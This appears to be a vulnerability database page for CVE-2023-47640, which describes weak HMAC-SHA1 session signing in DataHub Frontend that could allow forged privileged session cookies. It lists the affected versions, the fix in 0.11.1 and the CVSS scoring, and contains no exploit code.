Insecure Use of HMAC-SHA1 For Session Signing in datahub
CVE-2023-47640

8.8HIGH

Key Information:

Vendor: datahub-project
Status: datahub
Vendor: CVE Published:; 14 November 2023

🔔 Create datahub-project Vulnerability Alert

What is CVE-2023-47640?

The DataHub Frontend platform is susceptible to a session management vulnerability due to the use of SHA-1 HMAC for session signing with an inadequately short key length. This flaw allows authenticated attackers to potentially crack the signing key by exploiting the default configurations of the Play LegacyCookiesModule. As a result, if an attacker obtains a session token, they can generate a privileged session cookie, leading to elevated privileges within the platform. Users are urged to upgrade to version 0.11.1 and rotate their session signing secret to mitigate the risks associated with this vulnerability.

Affected Version(s)

datahub < 0.11.1

References

https://github.com/datahub-project/datahub/security/advis...

x_refsource_CONFIRM

CVSS V3.1

Score:

8.8

Severity:

HIGH

Confidentiality:

High

Integrity:

High

Availability:

High

Attack Vector:

Network

Attack Complexity:

Low

Privileges Required:

Low

User Interaction:

None

Scope:

Unchanged

Download the Critical Vulnerability Management Cheat Sheet

Timeline

Vulnerability published
Nov 14, 2023
Vulnerability Reserved
Nov 7, 2023

CVE-2023-47640 Data

JSON